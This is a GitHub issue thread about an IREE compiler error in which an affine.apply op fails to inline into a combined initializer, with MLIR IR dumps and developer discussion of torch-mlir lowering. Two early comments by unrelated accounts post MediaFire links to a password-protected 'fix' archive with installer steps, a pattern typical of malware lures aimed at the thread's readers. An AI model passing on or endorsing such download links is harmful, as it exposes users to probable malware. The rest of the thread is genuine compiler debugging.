### ISSUE TITLE
'util.initializer' op failed to inline into combined initializer

### ISSUE THREAD

**Issue by jinchen62** [iree-org/iree#18386]
### What happened?

The further error after https://github.com/iree-org/iree/issues/18232

```
repro.mlir:107:12: error: 'util.initializer' op failed to inline into combined initializer
    %414 = affine.apply #map32()[%408, %409, %247]
           ^
repro.mlir:7:3: note: called from
  func.func @torch_jit() -> index {
  ^
repro.mlir:107:12: note: see current operation: 
"util.initializer"() <{function_type = () -> ()}> ({
  %0 = "arith.constant"() <{value = 0 : i8}> : () -> i8
  %1 = "util.global.load"() <{global = @__hoisted_i32_21}> : () -> i32
  %2 = "stream.tensor.sizeof"() <{affinity = #hal.device.affinity<@__device_0>, encoding = tensor<1xi32>}> : () -> index
  %3 = "stream.tensor.splat"(%0, %2) <{affinity = #hal.device.affinity<@__device_0>, result_encoding = tensor<1xi32>}> : (i8, index) -> !stream.resource<*>
  %4 = "stream.tensor.sizeof"() <{affinity = #hal.device.affinity<@__device_0>, encoding = tensor<i32>}> : () -> index
  %5 = "stream.async.transfer"(%3, %4, %4) <{result_affinity = #hal.device.affinity<@__device_0>, source_affinity = #hal.device.affinity<@__device_0>}> : (!stream.resource<*>, index, index) -> !stream.resource<staging>
  %6 = "stream.tensor.load"(%5, %4) <{operandSegmentSizes = array<i32: 1, 0, 1, 0>, source_encoding = tensor<i32>}> : (!stream.resource<staging>, index) -> i32
  %7 = "arith.index_cast"(%6) : (i32) -> index
  %8 = "arith.index_cast"(%1) : (i32) -> index
  %9 = "affine.apply"(%7, %8) <{map = affine_map<()[s0, s1] -> (s0 + s1 + 1)>}> : (index, index) -> index
  %10 = "arith.index_cast"(%9) : (index) -> i64
  "util.global.store"(%10) <{global = @__hoisted_i64}> : (i64) -> ()
  "util.return"() : () -> ()
}) {stream.affinity.default = #hal.device.affinity<@__device_0>} : () -> ()
    %414 = affine.apply #map32()[%408, %409, %247]
           ^
```

### Steps to reproduce your issue

1. Repro: https://gist.github.com/jinchen62/79d3f497ad8ef45c30b3f9803390685d
2. `iree-compile --iree-input-demote-i64-to-i32 --iree-hal-target-backends=llvm-cpu repro.mlir -o test.vmfb`

### Version information

Build TOM locally

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by benvanik** [comment]
It's not the bug here, but I'd look further back in the IR for where this is coming from - it's splatting a 0 value into a buffer to then load back that 0 and store it in a global that then somewhere is likely being loaded in a dispatch as if it's anything but a 0 - that's _really dumb_. Probably indicates a missing folder earlier on.

**Comment by benvanik** [comment]
(consteval may handle this case but not others in the program if this is a new construct we haven't optimized yet, and running full consteval to do this slows down compilation)

**Comment by AWoloszyn** [comment]
If I am reading this right (and there is a VERY good chance I am not), it looks like, at least according to AffineOps.cpp, we can't inline any affine operation (like our `affine.apply` up there) into any non-affine op/scope.

```c++

  /// Returns true if the given operation 'op', that is registered to this
  /// dialect, can be inlined into the given region, false otherwise.
  bool isLegalToInline(Operation *op, Region *region, bool wouldBeCloned,
                       IRMapping &valueMapping) const final {
    // Always allow inlining affine operations into a region that is marked as
    // affine scope, or into affine loops and conditionals. There are some edge
    // cases when inlining *into* affine structures, but that is handled in the
    // other 'isLegalToInline' hook above.
    Operation *parentOp = region->getParentOp();
    return parentOp->hasTrait<OpTrait::AffineScope>() ||
           isa<AffineForOp, AffineParallelOp, AffineIfOp>(parentOp);
  }

```

**Comment by benvanik** [comment]
oof, that's bad

**Comment by AWoloszyn** [comment]
So looking at: https://mlir.llvm.org/docs/Dialects/Affine/#affineapply-affineaffineapplyop
I feel like we SHOULD just be able to inline an `affine.apply` op outside of an AffineScope/for/parallel/if since the apply is pretty self-contained. However, https://github.com/iree-org/llvm-project/commit/dacfb24b301d2f0422f2c7a23e2919e2f35cd932 removed the ability to do so, and I am unclear as to why.

**Comment by benvanik** [comment]
Yeah, I don't understand either - we use affine.apply everywhere (which you're finding) as everyone has said "it's just a way to calculate some indexing math" - if it really is locked down to just affine scopes we'll need to make our own version that does the same thing or get that restriction lifted.

**Comment by MaheshRavishankar** [comment]
That comment is dated. Am the affine stuff can be inlined anywhere. It's just indexing math. You can also lower them to arith ops and then deal with them. But I am on my phone and will have to look at the IR dump to see what's really happening

**Comment by benvanik** [comment]
The comment may be dated but the code is still doing that - if you think it's safe to remove (or conditionally do it based on the `op` being inlined) that'd be useful!

**Comment by MaheshRavishankar** [comment]
Ok, Here is the IR from the repro 
```
#map22 = affine_map<(d0, d1) -> (d0, d1)>
#map23 = affine_map<(d0, d1) -> (d1, d0)>
#map28 = affine_map<() -> ()>
#map32 = affine_map<()[s0, s1, s2] -> (s0 + s1 + s2)>
module {
  ml_program.global private mutable @global_seed(dense<0> : tensor<i64>) : tensor<i64>
  func.func @torch_jit() -> index {
    %c602304_i64 = arith.constant 602304 : i64
    %c3137_i64 = arith.constant 3137 : i64
    %true = arith.constant true
    %c0 = arith.constant 0 : index
    %c0_i64 = arith.constant 0 : i64
    %c1_i64 = arith.constant 1 : i64
    %cst_11 = arith.constant dense<[[0, 0], [1, 0], [0, 0], [0, 0]]> : tensor<4x2xi64>
    %cst_55 = arith.constant dense<8> : tensor<1xi64>
    %cst_62 = arith.constant dense<3> : tensor<1xi64>
    %cst_175 = arith.constant dense<8> : tensor<i64>
    %cst_182 = arith.constant dense<1> : tensor<1xi64>
    %cst_184 = arith.constant dense<64> : tensor<i64>
    %cst_185 = arith.constant dense<1> : tensor<i64>
    %cst_186 = arith.constant dense<192> : tensor<i64>
    %extracted_slice_233 = tensor.extract_slice %cst_11[3, 0] [4, 2] [-1, 1] : tensor<4x2xi64> to tensor<4x2xi64>
    %199 = tensor.empty() : tensor<i64>
    %200 = linalg.generic {indexing_maps = [#map28, #map28, #map28], iterator_types = []} ins(%cst_184, %cst_175 : tensor<i64>, tensor<i64>) outs(%199 : tensor<i64>) {
    ^bb0(%in: i64, %in_829: i64, %out: i64):
      %2330 = arith.divsi %in, %in_829 : i64
      linalg.yield %2330 : i64
    } -> tensor<i64>
    %201 = tensor.empty() : tensor<1xi64>
    %202 = linalg.fill ins(%c3137_i64 : i64) outs(%201 : tensor<1xi64>) -> tensor<1xi64>
    %expanded_268 = tensor.expand_shape %200 [] output_shape [1] : tensor<i64> into tensor<1xi64>
    %concat_269 = tensor.concat dim(0) %cst_182, %202, %cst_62, %cst_55, %expanded_268 : (tensor<1xi64>, tensor<1xi64>, tensor<1xi64>, tensor<1xi64>, tensor<1xi64>) -> tensor<5xi64>
    %extracted_slice_270 = tensor.extract_slice %concat_269[0] [1] [1] : tensor<5xi64> to tensor<1xi64>
    %extracted_271 = tensor.extract %extracted_slice_270[%c0] : tensor<1xi64>
    %203 = arith.cmpi eq, %extracted_271, %c0_i64 : i64
    %204 = tensor.empty() : tensor<i1>
    %205 = linalg.fill ins(%203 : i1) outs(%204 : tensor<i1>) -> tensor<i1>
    %206 = linalg.fill ins(%extracted_271 : i64) outs(%199 : tensor<i64>) -> tensor<i64>
    %207 = linalg.generic {indexing_maps = [#map28, #map28, #map28, #map28], iterator_types = []} ins(%205, %cst_185, %206 : tensor<i1>, tensor<i64>, tensor<i64>) outs(%199 : tensor<i64>) {
    ^bb0(%in: i1, %in_829: i64, %in_830: i64, %out: i64):
      %2330 = arith.select %in, %in_829, %in_830 : i64
      linalg.yield %2330 : i64
    } -> tensor<i64>
    %extracted_272 = tensor.extract %207[] : tensor<i64>
    %extracted_slice_273 = tensor.extract_slice %concat_269[1] [1] [1] : tensor<5xi64> to tensor<1xi64>
    %extracted_274 = tensor.extract %extracted_slice_273[%c0] : tensor<1xi64>
    %208 = arith.cmpi eq, %extracted_274, %c0_i64 : i64
    %209 = linalg.fill ins(%208 : i1) outs(%204 : tensor<i1>) -> tensor<i1>
    %210 = linalg.fill ins(%c3137_i64 : i64) outs(%199 : tensor<i64>) -> tensor<i64>
    %211 = linalg.fill ins(%extracted_274 : i64) outs(%199 : tensor<i64>) -> tensor<i64>
    %212 = linalg.generic {indexing_maps = [#map28, #map28, #map28, #map28], iterator_types = []} ins(%209, %210, %211 : tensor<i1>, tensor<i64>, tensor<i64>) outs(%199 : tensor<i64>) {
    ^bb0(%in: i1, %in_829: i64, %in_830: i64, %out: i64):
      %2330 = arith.select %in, %in_829, %in_830 : i64
      linalg.yield %2330 : i64
    } -> tensor<i64>
    %extracted_275 = tensor.extract %212[] : tensor<i64>
    %extracted_slice_276 = tensor.extract_slice %concat_269[2] [1] [1] : tensor<5xi64> to tensor<1xi64>
    %extracted_277 = tensor.extract %extracted_slice_276[%c0] : tensor<1xi64>
    %213 = arith.cmpi eq, %extracted_277, %c0_i64 : i64
    %214 = linalg.fill ins(%213 : i1) outs(%204 : tensor<i1>) -> tensor<i1>
    %215 = linalg.fill ins(%extracted_277 : i64) outs(%199 : tensor<i64>) -> tensor<i64>
    %216 = linalg.generic {indexing_maps = [#map28, #map28, #map28, #map28], iterator_types = []} ins(%214, %cst_186, %215 : tensor<i1>, tensor<i64>, tensor<i64>) outs(%199 : tensor<i64>) {
    ^bb0(%in: i1, %in_829: i64, %in_830: i64, %out: i64):
      %2330 = arith.select %in, %in_829, %in_830 : i64
      linalg.yield %2330 : i64
    } -> tensor<i64>
    %extracted_278 = tensor.extract %216[] : tensor<i64>
    %extracted_slice_279 = tensor.extract_slice %concat_269[3] [1] [1] : tensor<5xi64> to tensor<1xi64>
    %extracted_280 = tensor.extract %extracted_slice_279[%c0] : tensor<1xi64>
    %extracted_slice_281 = tensor.extract_slice %concat_269[4] [1] [1] : tensor<5xi64> to tensor<1xi64>
    %extracted_282 = tensor.extract %extracted_slice_281[%c0] : tensor<1xi64>
    %217 = arith.cmpi slt, %extracted_272, %c0_i64 : i64
    %218 = arith.select %217, %c1_i64, %extracted_272 : i64
    %220 = arith.muli %218, %extracted_275 : i64
    %222 = arith.cmpi slt, %extracted_275, %c0_i64 : i64
    %223 = arith.select %222, %218, %220 : i64
    %225 = arith.muli %223, %extracted_278 : i64
    %227 = arith.cmpi slt, %extracted_278, %c0_i64 : i64
    %228 = arith.select %227, %223, %225 : i64
    %230 = arith.muli %228, %extracted_280 : i64
    %232 = arith.cmpi slt, %extracted_280, %c0_i64 : i64
    %233 = arith.select %232, %228, %230 : i64
    %235 = arith.muli %233, %extracted_282 : i64
    %237 = arith.cmpi slt, %extracted_282, %c0_i64 : i64
    %238 = arith.select %237, %233, %235 : i64
    %241 = arith.divsi %c602304_i64, %238 : i64
    %242 = arith.select %217, %241, %extracted_272 : i64
    %247 = arith.index_cast %242 : i64 to index
    %cast_325 = tensor.cast %extracted_slice_233 : tensor<4x2xi64> to tensor<?x?xi64>
    %cast_326 = tensor.cast %cast_325 : tensor<?x?xi64> to tensor<2x2xi64>
    %406 = tensor.empty() : tensor<2x2xi64>
    %407 = linalg.generic {indexing_maps = [#map22, #map23], iterator_types = ["parallel", "parallel"]} ins(%cast_326 : tensor<2x2xi64>) outs(%406 : tensor<2x2xi64>) {
    ^bb0(%in: i64, %out: i64):
      linalg.yield %in : i64
    } -> tensor<2x2xi64>
    %collapsed_327 = tensor.collapse_shape %407 [[0, 1]] : tensor<2x2xi64> into tensor<4xi64>
    %extracted_slice_328 = tensor.extract_slice %collapsed_327[0] [1] [1] : tensor<4xi64> to tensor<1xi64>
    %collapsed_329 = tensor.collapse_shape %extracted_slice_328 [] : tensor<1xi64> into tensor<i64>
    %extracted_330 = tensor.extract %collapsed_329[] : tensor<i64>
    %extracted_slice_340 = tensor.extract_slice %collapsed_327[4] [0] [1] : tensor<4xi64> to tensor<0xi64>
    %cast_341 = tensor.cast %extracted_slice_340 : tensor<0xi64> to tensor<?xi64>
    %cast_342 = tensor.cast %cast_341 : tensor<?xi64> to tensor<1xi64>
    %collapsed_343 = tensor.collapse_shape %cast_342 [] : tensor<1xi64> into tensor<i64>
    %extracted_344 = tensor.extract %collapsed_343[] : tensor<i64>
    %408 = arith.index_cast %extracted_330 : i64 to index
    %409 = arith.index_cast %extracted_344 : i64 to index
    %414 = affine.apply #map32()[%408, %409, %247]
    return %414 : index
  }
}
```

If I am reading this correctly this is all just indexing math. None of this should be tensor operations. Also I see operations like this
```
%extracted_slice_233 = tensor.extract_slice %cst_11[3, 0] [4, 2] [-1, 1] : tensor<4x2xi64> to tensor<4x2xi64>
```
I am amazed that `tensor.extract_slice` even supports this, but negative strides are not something that I can say for sure we support properly. All this is doing is reading a cst in reverse.

```
%extracted_slice_340 = tensor.extract_slice %collapsed_327[4] [0] [1] : tensor<4xi64> to tensor<0xi64>
```
which is a zero-ranked tensor. This is even more egregious. Semantics of that is very hairy and I am fairly certain this is not actually what the program is trying to do.

I am not sure what of this is real and just an artifact from reduced programs, but this input as is really needs to be cleaned up. Last time we saw something like this, we were going to try to fix this at torch level. It is still a possibility that we need to fix it lower than torch, but that is the current plan.

Actually this just seems wrong
```
%extracted_slice_340 = tensor.extract_slice %collapsed_327[4] [0] [1] : tensor<4xi64> to tensor<0xi64>
    %cast_341 = tensor.cast %extracted_slice_340 : tensor<0xi64> to tensor<?xi64>
    %cast_342 = tensor.cast %cast_341 : tensor<?xi64> to tensor<1xi64>
```

It is effectively casting a `tensor<0xi64>` to `tensor<1xi64>`

cc @zjgarvey

**Comment by benvanik** [comment]
Good points - negative indexing and 0-element tensors are a big red flag. I'm quite sure that will cause issues somewhere. I don't think it solves the failed to inline issue but maybe we won't have that when the IR is cleaned up.

**Comment by zjgarvey** [comment]
I'm hoping that some shape inference/ shape scalarization work will unblock this. I'll take a look at the models and see what patterns we might be missing and plug them in.

**Comment by vivekkhandelwal1** [comment]
The `affine.apply's` are introduced by canonicalizer pass, it's not part of any TorchToLinalg lowering. See the IR snippet below after both the passes:

**IR After ConvertTorchToLinalg (convert-torch-to-linalg)**
```
  %cast_1195 = tensor.cast %concat_1183 : tensor<?x64x?x?xf32> to tensor<1x64x?x?xf32>
  %collapsed_1196 = tensor.collapse_shape %cast_1195 [[0], [1], [2, 3]] : tensor<1x64x?x?xf32> into tensor<1x64x?xf32>
  %c2_1197 = arith.constant 2 : index
  %dim_1198 = tensor.dim %collapsed_1196, %c2_1197 : tensor<1x64x?xf32>
  %c1_1199 = arith.constant 1 : index
  %expanded_1200 = tensor.expand_shape %collapsed_1196 [[0], [1, 2], [3]] output_shape [1, 8, 8, %dim_1198] : tensor<1x64x?xf32> into tensor<1x8x8x?xf32>
```


**IR After Canonicalizer (canonicalize)**
```
  %cast_56 = tensor.cast %concat_54 : tensor<?x64x?x?xf32> to tensor<1x64x?x?xf32>
  %collapsed_57 = tensor.collapse_shape %cast_56 [[0], [1], [2, 3]] : tensor<1x64x?x?xf32> into tensor<1x64x?xf32>
  %dim_58 = tensor.dim %concat_54, %c2 : tensor<?x64x?x?xf32>
  %dim_59 = tensor.dim %concat_54, %c3 : tensor<?x64x?x?xf32>
  %337 = affine.apply affine_map<()[s0, s1] -> (s0 * s1)>()[%dim_58, %dim_59]
  %expanded_60 = tensor.expand_shape %collapsed_57 [[0], [1, 2], [3]] output_shape [1, 8, 8, %337] : tensor<1x64x?xf32> into tensor<1x8x8x?xf32>
  %cast_61 = tensor.cast %expanded_60 : tensor<1x8x8x?xf32> to tensor<1x8x8x3136xf32>
```

You can see that these `affine.apply's` are introduced by the canonicalize pass. Some of the affine.apply's are added in the IR by `ResolveShapedTypeResultDims (resolve-shaped-type-result-dims)` pass. I don't think we can eliminate these affine.apply's by making any change in the Torch or Linalg lowering, please correct me if my understanding is wrong.

> If I am reading this correctly this is all just indexing math. None of this should be tensor operations. Also I see operations like this
> ```
> %extracted_slice_233 = tensor.extract_slice %cst_11[3, 0] [4, 2] [-1, 1] : tensor<4x2xi64> to tensor<4x2xi64>
> ```
> I am amazed that `tensor.extract_slice` even supports this, but negative strides are not something that I can say for sure we support properly. All this is doing is reading a cst in reverse.

This IR seems to be old, since this negative stride issue was fixed here: https://github.com/llvm/torch-mlir/commit/f6721e599961a36d67236fce9f58cdd719c9cef4

> ```
> %extracted_slice_340 = tensor.extract_slice %collapsed_327[4] [0] [1] : tensor<4xi64> to tensor<0xi64>
> ```
> 
> which is a zero-ranked tensor. This is even more egregious. Semantics of that is very hairy and I am fairly certain this is not actually what the program is trying to do.
> 
> I am not sure what of this is real and just an artifact from reduced programs, but this input as is really needs to be cleaned up. Last time we saw something like this, we were going to try to fix this at torch level. It is still a possibility that we need to fix it lower than torch, but that is the current plan.

To me, it seems that this extract slice was also generated because of some support missing, in the IR that I generated today I don't see any such extract_slice.


So, out of all the issues raised above, the only one which has to be addressed is related to affine.apply, which again seem not be because of any code in the Torch-MLIR.

@MaheshRavishankar @kumardeepakamd @benvanik @pdhirajkumarprasad

**Comment by MaheshRavishankar** [comment]
> The `affine.apply's` are introduced by canonicalizer pass, it's not part of any TorchToLinalg lowering. See the IR snippet below after both the passes:
> 
> **IR After ConvertTorchToLinalg (convert-torch-to-linalg)**
> 
> ```
>   %cast_1195 = tensor.cast %concat_1183 : tensor<?x64x?x?xf32> to tensor<1x64x?x?xf32>
>   %collapsed_1196 = tensor.collapse_shape %cast_1195 [[0], [1], [2, 3]] : tensor<1x64x?x?xf32> into tensor<1x64x?xf32>
>   %c2_1197 = arith.constant 2 : index
>   %dim_1198 = tensor.dim %collapsed_1196, %c2_1197 : tensor<1x64x?xf32>
>   %c1_1199 = arith.constant 1 : index
>   %expanded_1200 = tensor.expand_shape %collapsed_1196 [[0], [1, 2], [3]] output_shape [1, 8, 8, %dim_1198] : tensor<1x64x?xf32> into tensor<1x8x8x?xf32>
> ```
> 
> **IR After Canonicalizer (canonicalize)**
> 
> ```
>   %cast_56 = tensor.cast %concat_54 : tensor<?x64x?x?xf32> to tensor<1x64x?x?xf32>
>   %collapsed_57 = tensor.collapse_shape %cast_56 [[0], [1], [2, 3]] : tensor<1x64x?x?xf32> into tensor<1x64x?xf32>
>   %dim_58 = tensor.dim %concat_54, %c2 : tensor<?x64x?x?xf32>
>   %dim_59 = tensor.dim %concat_54, %c3 : tensor<?x64x?x?xf32>
>   %337 = affine.apply affine_map<()[s0, s1] -> (s0 * s1)>()[%dim_58, %dim_59]
>   %expanded_60 = tensor.expand_shape %collapsed_57 [[0], [1, 2], [3]] output_shape [1, 8, 8, %337] : tensor<1x64x?xf32> into tensor<1x8x8x?xf32>
>   %cast_61 = tensor.cast %expanded_60 : tensor<1x8x8x?xf32> to tensor<1x8x8x3136xf32>
> ```
> 
> You can see that these `affine.apply's` are introduced by the canonicalize pass. Some of the affine.apply's are added in the IR by `ResolveShapedTypeResultDims (resolve-shaped-type-result-dims)` pass. I don't think we can eliminate these affine.apply's by making any change in the Torch or Linalg lowering, please correct me if my understanding is wrong.
> 
> > If I am reading this correctly this is all just indexing math. None of this should be tensor operations. Also I see operations like this
> > ```
> > %extracted_slice_233 = tensor.extract_slice %cst_11[3, 0] [4, 2] [-1, 1] : tensor<4x2xi64> to tensor<4x2xi64>
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > I am amazed that `tensor.extract_slice` even supports this, but negative strides are not something that I can say for sure we support properly. All this is doing is reading a cst in reverse.
> 
> This IR seems to be old, since this negative stride issue was fixed here: [llvm/torch-mlir@f6721e5](https://github.com/llvm/torch-mlir/commit/f6721e599961a36d67236fce9f58cdd719c9cef4)
> 
> > ```
> > %extracted_slice_340 = tensor.extract_slice %collapsed_327[4] [0] [1] : tensor<4xi64> to tensor<0xi64>
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > which is a zero-ranked tensor. This is even more egregious. Semantics of that is very hairy and I am fairly certain this is not actually what the program is trying to do.
> > I am not sure what of this is real and just an artifact from reduced programs, but this input as is really needs to be cleaned up. Last time we saw something like this, we were going to try to fix this at torch level. It is still a possibility that we need to fix it lower than torch, but that is the current plan.
> 
> To me, it seems that this extract slice was also generated because of some support missing, in the IR that I generated today I don't see any such extract_slice.
> 
> So, out of all the issues raised above, the only one which has to be addressed is related to affine.apply, which again seem not be because of any code in the Torch-MLIR.
> 
> [@MaheshRavishankar](https://github.com/MaheshRavishankar) [@kumardeepakamd](https://github.com/kumardeepakamd) [@benvanik](https://github.com/benvanik) [@pdhirajkumarprasad](https://github.com/pdhirajkumarprasad)

There were three issues raised above. The extract_slice negative stride was only one of those. THere is also a zero-ranked tensor. Basically this entire input IR is just index computation. So until that is fixed there is really not much we can do in compiler. I am not trying to "pass the ball" here, but really this is just index computation. This entire input IR should have only scalar math (and then its not even something that is interesting for IREE to run).

**Comment by vivekkhandelwal1** [comment]
@jinchen62 Can you please let me know from where and how did you get this IR? Since, I didn't see this 0 sized tensor in the model that I run.

**Comment by vivekkhandelwal1** [comment]
> > The `affine.apply's` are introduced by canonicalizer pass, it's not part of any TorchToLinalg lowering. See the IR snippet below after both the passes:
> > **IR After ConvertTorchToLinalg (convert-torch-to-linalg)**
> > ```
> >   %cast_1195 = tensor.cast %concat_1183 : tensor<?x64x?x?xf32> to tensor<1x64x?x?xf32>
> >   %collapsed_1196 = tensor.collapse_shape %cast_1195 [[0], [1], [2, 3]] : tensor<1x64x?x?xf32> into tensor<1x64x?xf32>
> >   %c2_1197 = arith.constant 2 : index
> >   %dim_1198 = tensor.dim %collapsed_1196, %c2_1197 : tensor<1x64x?xf32>
> >   %c1_1199 = arith.constant 1 : index
> >   %expanded_1200 = tensor.expand_shape %collapsed_1196 [[0], [1, 2], [3]] output_shape [1, 8, 8, %dim_1198] : tensor<1x64x?xf32> into tensor<1x8x8x?xf32>
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > **IR After Canonicalizer (canonicalize)**
> > ```
> >   %cast_56 = tensor.cast %concat_54 : tensor<?x64x?x?xf32> to tensor<1x64x?x?xf32>
> >   %collapsed_57 = tensor.collapse_shape %cast_56 [[0], [1], [2, 3]] : tensor<1x64x?x?xf32> into tensor<1x64x?xf32>
> >   %dim_58 = tensor.dim %concat_54, %c2 : tensor<?x64x?x?xf32>
> >   %dim_59 = tensor.dim %concat_54, %c3 : tensor<?x64x?x?xf32>
> >   %337 = affine.apply affine_map<()[s0, s1] -> (s0 * s1)>()[%dim_58, %dim_59]
> >   %expanded_60 = tensor.expand_shape %collapsed_57 [[0], [1, 2], [3]] output_shape [1, 8, 8, %337] : tensor<1x64x?xf32> into tensor<1x8x8x?xf32>
> >   %cast_61 = tensor.cast %expanded_60 : tensor<1x8x8x?xf32> to tensor<1x8x8x3136xf32>
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > You can see that these `affine.apply's` are introduced by the canonicalize pass. Some of the affine.apply's are added in the IR by `ResolveShapedTypeResultDims (resolve-shaped-type-result-dims)` pass. I don't think we can eliminate these affine.apply's by making any change in the Torch or Linalg lowering, please correct me if my understanding is wrong.
> > > If I am reading this correctly this is all just indexing math. None of this should be tensor operations. Also I see operations like this
> > > ```
> > > %extracted_slice_233 = tensor.extract_slice %cst_11[3, 0] [4, 2] [-1, 1] : tensor<4x2xi64> to tensor<4x2xi64>
> > > ```
> > > 
> > > 
> > >     
> > >       
> > >     
> > > 
> > >       
> > >     
> > > 
> > >     
> > >   
> > > I am amazed that `tensor.extract_slice` even supports this, but negative strides are not something that I can say for sure we support properly. All this is doing is reading a cst in reverse.
> > 
> > 
> > This IR seems to be old, since this negative stride issue was fixed here: [llvm/torch-mlir@f6721e5](https://github.com/llvm/torch-mlir/commit/f6721e599961a36d67236fce9f58cdd719c9cef4)
> > > ```
> > > %extracted_slice_340 = tensor.extract_slice %collapsed_327[4] [0] [1] : tensor<4xi64> to tensor<0xi64>
> > > ```
> > > 
> > > 
> > >     
> > >       
> > >     
> > > 
> > >       
> > >     
> > > 
> > >     
> > >   
> > > which is a zero-ranked tensor. This is even more egregious. Semantics of that is very hairy and I am fairly certain this is not actually what the program is trying to do.
> > > I am not sure what of this is real and just an artifact from reduced programs, but this input as is really needs to be cleaned up. Last time we saw something like this, we were going to try to fix this at torch level. It is still a possibility that we need to fix it lower than torch, but that is the current plan.
> > 
> > 
> > To me, it seems that this extract slice was also generated because of some support missing, in the IR that I generated today I don't see any such extract_slice.
> > So, out of all the issues raised above, the only one which has to be addressed is related to affine.apply, which again seem not be because of any code in the Torch-MLIR.
> > [@MaheshRavishankar](https://github.com/MaheshRavishankar) [@kumardeepakamd](https://github.com/kumardeepakamd) [@benvanik](https://github.com/benvanik) [@pdhirajkumarprasad](https://github.com/pdhirajkumarprasad)
> 
> There were three issues raised above. The extract_slice negative stride was only one of those. THere is also a zero-ranked tensor. Basically this entire input IR is just index computation. So until that is fixed there is really not much we can do in compiler. I am not trying to "pass the ball" here, but really this is just index computation. This entire input IR should have only scalar math (and then its not even something that is interesting for IREE to run).

Sure, @MaheshRavishankar. I will take a look at this. I just wanted to convey that those affine.apply's are not something which are added during the Torch->Linalg lowering they were introduced by some MLIR passes. I can see what can be done for that. In order to fix this issue, should the goal be to get those `affine.apply`'s eliminated from the IR?

**Comment by jinchen62** [comment]
@vivekkhandelwal1 I extracted the repro from one of the models of this [list](https://gist.github.com/jinchen62/d7308d129b1c7000f4bc8c27b4512915), maybe `onnx/models/botnet26t_256`. This list is from HF CNN f32 and all had this issue, but it should be outdated. Maybe some shape inference related issues were resolved.

@pdhirajkumarprasad It would be good to update the repro.

**Comment by MaheshRavishankar** [comment]
> Sure, [@MaheshRavishankar](https://github.com/MaheshRavishankar). I will take a look at this. I just wanted to convey that those affine.apply's are not something which are added during the Torch->Linalg lowering they were introduced by some MLIR passes. I can see what can be done for that. In order to fix this issue, should the goal be to get those `affine.apply`'s eliminated from the IR?

The `affine.apply`s are not the issue. It is the way this is lowered into Linalg. This is all essentially index computation. There shouldnt be any Linalg.

**Comment by vivekkhandelwal1** [comment]
This issue is fixed by https://github.com/iree-org/iree/pull/18765.
